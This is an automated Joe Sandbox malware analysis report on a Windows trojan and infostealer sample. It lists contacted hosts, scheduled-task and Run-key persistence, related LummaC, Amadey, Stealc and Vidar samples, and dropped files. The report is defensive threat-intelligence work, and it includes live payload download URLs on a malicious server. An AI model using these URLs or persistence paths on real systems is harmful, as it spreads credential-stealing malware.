                                                                                                                                                                                                                31.41.244.11
                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                		61974AEROEXPRESS-ASRUfalse
                                                                                                                                                                                                                104.21.32.1
                                                                                                                                                                                                                		sexo.gofile.funUnited States
                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                185.215.113.16
                                                                                                                                                                                                                		unknownPortugal
                                                                                                                                                                                                                		206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                140.82.121.3
                                                                                                                                                                                                                		github.comUnited States
                                                                                                                                                                                                                		36459GITHUBUSfalse
                                                                                                                                                                                                                34.147.147.173
                                                                                                                                                                                                                		home.fortth14vs.topUnited States
                                                                                                                                                                                                                		2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                                188.114.97.3
                                                                                                                                                                                                                		pancakedipyps.clickEuropean Union
                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                239.255.255.250
                                                                                                                                                                                                                		unknownReserved
                                                                                                                                                                                                                		unknownunknownfalse
                                                                                                                                                                                                                135.181.65.216
                                                                                                                                                                                                                		unknownGermany
                                                                                                                                                                                                                		24940HETZNER-ASDEtrue
                                                                                                                                                                                                                185.215.113.209
                                                                                                                                                                                                                		unknownPortugal
                                                                                                                                                                                                                		206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                                                142.250.186.164
                                                                                                                                                                                                                		www.google.comUnited States
                                                                                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                                                                                185.199.108.133
                                                                                                                                                                                                                		objects.githubusercontent.comNetherlands
                                                                                                                                                                                                                		54113FASTLYUSfalse
                                                                                                                                                                                                                185.215.113.206
                                                                                                                                                                                                                		unknownPortugal
                                                                                                                                                                                                                		206894WHOLESALECONNECTIONSNLtrue

                                                                                                                                                                                                                Private

                                                                                                                                                                                                                IP
                                                                                                                                                                                                                192.168.2.4
                                                                                                                                                                                                                127.0.0.1

                                                                                                                                                                                                                General Information

                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                Analysis ID:1583666
                                                                                                                                                                                                                Start date and time:2025-01-03 09:48:06 +01:00
                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                Overall analysis duration:0h 13m 28s
                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                Number of analysed new started processes analysed:36
                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                Sample name:ebjtOH70jl.exe
                                                                                                                                                                                                                renamed because original name is a hash value
                                                                                                                                                                                                                Original Sample Name:9b85ae26f1588d1238395258076430b282476882128aeec79066bf10af37d8e2.exe
                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@75/157@32/18
                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                • Successful, ratio: 85.7%
                                                                                                                                                                                                                HCA Information:Failed
                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                • Found application associated with file extension: .exe

                                                                                                                                                                                                                Warnings

                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 199.232.214.172, 192.229.221.95, 142.250.185.227, 142.250.186.174, 142.251.173.84, 216.58.212.174, 142.250.181.227, 172.217.16.206, 142.250.186.106, 142.250.181.234, 142.250.185.170, 142.250.186.170, 172.217.18.106, 142.250.185.106, 216.58.206.42, 172.217.18.10, 142.250.186.42, 142.250.184.202, 142.250.185.202, 142.250.185.234, 142.250.74.202, 142.250.186.138, 172.217.16.138, 142.250.185.138, 142.250.185.238, 172.217.18.3, 172.217.16.142, 64.233.184.84, 142.250.185.206, 172.217.23.110, 142.250.184.234, 172.217.16.202, 216.58.206.74, 142.250.186.74, 142.250.185.74, 172.217.23.106, 216.58.206.78, 4.175.87.197, 13.107.246.45, 23.56.254.164
                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, clients.l.google.com, www.gstatic.com
                                                                                                                                                                                                                • Execution Graph export aborted for target legs.exe, PID 6408 because there are no executed function
                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                Simulations

                                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                03:50:02API Interceptor16662x Sleep call for process: axplong.exe modified
                                                                                                                                                                                                                03:50:11API Interceptor8x Sleep call for process: legs.exe modified
                                                                                                                                                                                                                03:50:20API Interceptor8x Sleep call for process: gold1111111111.exe modified
                                                                                                                                                                                                                03:50:59API Interceptor49x Sleep call for process: 0d261d49cf.exe modified
                                                                                                                                                                                                                03:51:02API Interceptor39x Sleep call for process: defnur.exe modified
                                                                                                                                                                                                                08:49:00Task SchedulerRun new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                08:50:07Task SchedulerRun new task: defnur path: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                                                                                                                                                                                08:50:47AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 0d261d49cf.exe C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe
                                                                                                                                                                                                                08:50:53Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                08:50:56AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 834ad20df2.exe C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exe
                                                                                                                                                                                                                08:51:06AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 0d261d49cf.exe C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe
                                                                                                                                                                                                                08:51:15AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 834ad20df2.exe C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exe

                                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                                IPs

                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                172.67.156.127SWIFT_png.exeGet hashmaliciousFormBook GuLoaderBrowse
                                                                                                                                                                                                                • www.neebcoteam.com/c8bs/?Yj4DcBC8=T6Eesp979WQ1ytPK8IXAAzD88M93x9j9hbra4pBCCFsbFca3dtozJX6VGbTeuJZoJB12aN0IcQ==&k0GLEx=fzudFxtHN
                                                                                                                                                                                                                34.197.122.172random(4).exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                  Prs9eAnu2k.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    XJiB3BdLTg.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      yqUQPPp0LM.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        ZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          Hqle5OSmLQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            Set-up.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              31.41.244.11vVJvxAfBDM.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                              • 31.41.244.11/files/fate/random.exe
                                                                                                                                                                                                                              8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                                                                                                                                              • 31.41.244.11/files/kardanvalov88/random.exe
                                                                                                                                                                                                                              Idau8QuYa3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                              • 31.41.244.11/files/zipcryptservice/random.exe
                                                                                                                                                                                                                              0Pm0sadcCP.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                              • 31.41.244.11/files/fate/random.exe
                                                                                                                                                                                                                              fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                                                              • 31.41.244.11/files/client.exe
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                              • 31.41.244.11/files/unique2/random.exe
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 31.41.244.11/files/martin/random.exe
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                              • 31.41.244.11/files/karl/random.exe
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                              • 31.41.244.11/files/karl/random.exe
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                              • 31.41.244.11/files/unique2/random.exe

                                                                                                                                                                                                                              Domains

                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              plus.l.google.comhttps://specificallycries.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 142.250.186.142
                                                                                                                                                                                                                              https://ntta.org-pay-u5ch.sbs/us/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 172.217.23.110
                                                                                                                                                                                                                              CenteredDealing.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              • 216.58.212.174
                                                                                                                                                                                                                              CenteredDealing.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              • 142.250.181.238
                                                                                                                                                                                                                              over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                              • 142.250.184.206
                                                                                                                                                                                                                              MatAugust.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              • 172.217.18.14
                                                                                                                                                                                                                              http://usps.com-trackaddn.top/lGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 142.250.186.174
                                                                                                                                                                                                                              6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              • 216.58.206.46
                                                                                                                                                                                                                              https://tepco-jp-lin;.%5Dshop/co/tepcoGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 172.217.16.206
                                                                                                                                                                                                                              BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              • 216.58.206.78
                                                                                                                                                                                                                              github.comGz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                                                                              ipmsg5.6.18_installer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 140.82.121.3
                                                                                                                                                                                                                              eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                                                                              fxsound_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 20.233.83.145
                                                                                                                                                                                                                              Electrum-bch-4.4.2-x86_64.AppImage.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 185.199.111.133
                                                                                                                                                                                                                              OiMp3TH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 20.233.83.145
                                                                                                                                                                                                                              YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 20.233.83.145
                                                                                                                                                                                                                              YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 20.233.83.145
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 20.233.83.145
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                              • 20.233.83.145
                                                                                                                                                                                                                              pancakedipyps.clickvVJvxAfBDM.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                              • 104.21.23.76
                                                                                                                                                                                                                              0Pm0sadcCP.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                              • 172.67.209.202
                                                                                                                                                                                                                              J18uCKmoAw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 172.67.209.202
                                                                                                                                                                                                                              fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                                                              • 172.67.209.202
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                              • 172.67.209.202
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 172.67.209.202
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                              • 104.21.23.76
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, SystemBC, zgRATBrowse
                                                                                                                                                                                                                              • 104.21.23.76
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                                                                                                                                              • 104.21.23.76
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                                                                                                                                                                                              • 172.67.209.202

                                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              AEROEXPRESS-ASRUrandom(4).exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 31.41.244.11
                                                                                                                                                                                                                              EdYEXasNiR.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 31.41.244.11
                                                                                                                                                                                                                              5EfYBe3nch.exeGet hashmaliciousLummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, StealcBrowse
                                                                                                                                                                                                                              • 31.41.244.11
                                                                                                                                                                                                                              w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                              • 31.41.244.11
                                                                                                                                                                                                                              5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                                                                                                                                                                                              • 31.41.244.11
                                                                                                                                                                                                                              vVJvxAfBDM.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                              • 31.41.244.11
                                                                                                                                                                                                                              8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                                                                                                                                              • 31.41.244.11
                                                                                                                                                                                                                              DRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 31.41.244.11
                                                                                                                                                                                                                              Idau8QuYa3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                              • 31.41.244.11
                                                                                                                                                                                                                              i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                                                                                                                              • 31.41.244.11
                                                                                                                                                                                                                              CLOUDFLARENETUSW2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                                                              FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                                                              Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 104.21.32.1
                                                                                                                                                                                                                              PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                              • 104.21.67.152
                                                                                                                                                                                                                              http://4.nscqn.dashboradcortx.xyz/4hbVgI3060FFjU163rczgakrldw288HJUBSXEIQRWLNTA425583MYLP8076x12Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 1.1.1.1
                                                                                                                                                                                                                              ogVinh0jhq.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                              • 104.20.4.235
                                                                                                                                                                                                                              https://myburbank-uat.3didemo.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                              • 104.26.13.57
                                                                                                                                                                                                                              hiwA7Blv7C.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                              • 172.67.19.24
                                                                                                                                                                                                                              http://hotelyetipokhara.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 104.21.96.1
                                                                                                                                                                                                                              https://realpaperworks.com/wp-content/red/UhPIYaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 104.21.96.1
                                                                                                                                                                                                                              AMAZON-AESUS4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 52.90.23.44
                                                                                                                                                                                                                              http://vaporblastingservices.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 52.73.88.64
                                                                                                                                                                                                                              https://ntta.org-pay-u5ch.sbs/us/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 52.1.244.107
                                                                                                                                                                                                                              DEMONS.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 52.23.161.4
                                                                                                                                                                                                                              DEMONS.spc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 54.165.27.225
                                                                                                                                                                                                                              DEMONS.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 52.20.130.122
                                                                                                                                                                                                                              Hilix.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                              • 54.210.201.131
                                                                                                                                                                                                                              random(4).exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 34.197.122.172
                                                                                                                                                                                                                              random(3).exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                                                                                              • 34.200.57.114

                                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              a0e9f5d64349fb13191bc781f81f42e1PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                                                              • 172.67.156.127
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                                                              • 172.67.156.127
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                                                              • 172.67.156.127
                                                                                                                                                                                                                              image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                                                              • 172.67.156.127
                                                                                                                                                                                                                              MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                                                              • 172.67.156.127
                                                                                                                                                                                                                              MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                                                              • 172.67.156.127
                                                                                                                                                                                                                              MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                                                              • 172.67.156.127
                                                                                                                                                                                                                              Setup.exe.7zGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                                                              • 172.67.156.127
                                                                                                                                                                                                                              176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                                                              • 172.67.156.127
                                                                                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                                                                              • 140.82.121.3
                                                                                                                                                                                                                              Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                                                                              • 140.82.121.3
                                                                                                                                                                                                                              file.exeGet hashmaliciousXRedBrowse
                                                                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                                                                              • 140.82.121.3
                                                                                                                                                                                                                              file.exeGet hashmaliciousXRedBrowse
                                                                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                                                                              • 140.82.121.3
                                                                                                                                                                                                                              file.exeGet hashmaliciousXRedBrowse
                                                                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                                                                              • 140.82.121.3
                                                                                                                                                                                                                              file.exeGet hashmaliciousXRedBrowse
                                                                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                                                                              • 140.82.121.3
                                                                                                                                                                                                                              file.exeGet hashmaliciousXRedBrowse
                                                                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                                                                              • 140.82.121.3
                                                                                                                                                                                                                              file.exeGet hashmaliciousXRedBrowse
                                                                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                                                                              • 140.82.121.3
                                                                                                                                                                                                                              file.exeGet hashmaliciousXRedBrowse
                                                                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                                                                              • 140.82.121.3
                                                                                                                                                                                                                              file.exeGet hashmaliciousXRedBrowse
                                                                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                                                                              • 140.82.121.3

                                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              C:\ProgramData\mozglue.dllrandom(4).exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                EdYEXasNiR.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                  5EfYBe3nch.exeGet hashmaliciousLummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, StealcBrowse
                                                                                                                                                                                                                                    random.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                      8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                        w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                          5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                                                                                                                                                                                                            DRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                              i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                                                                                                                                                glpEv3POe7.exeGet hashmaliciousStealc, VidarBrowse

                                                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                                                  C:\ProgramData\BFBAAFHD

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\BFBKFHIDHIIJJKECGHCFHCGIDA

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):5242880
                                                                                                                                                                                                                                                  Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                                  MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                                  SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                                  SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                                                  SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\BFHIJEBK

                                                                                                                                                                                                                                                  Download File
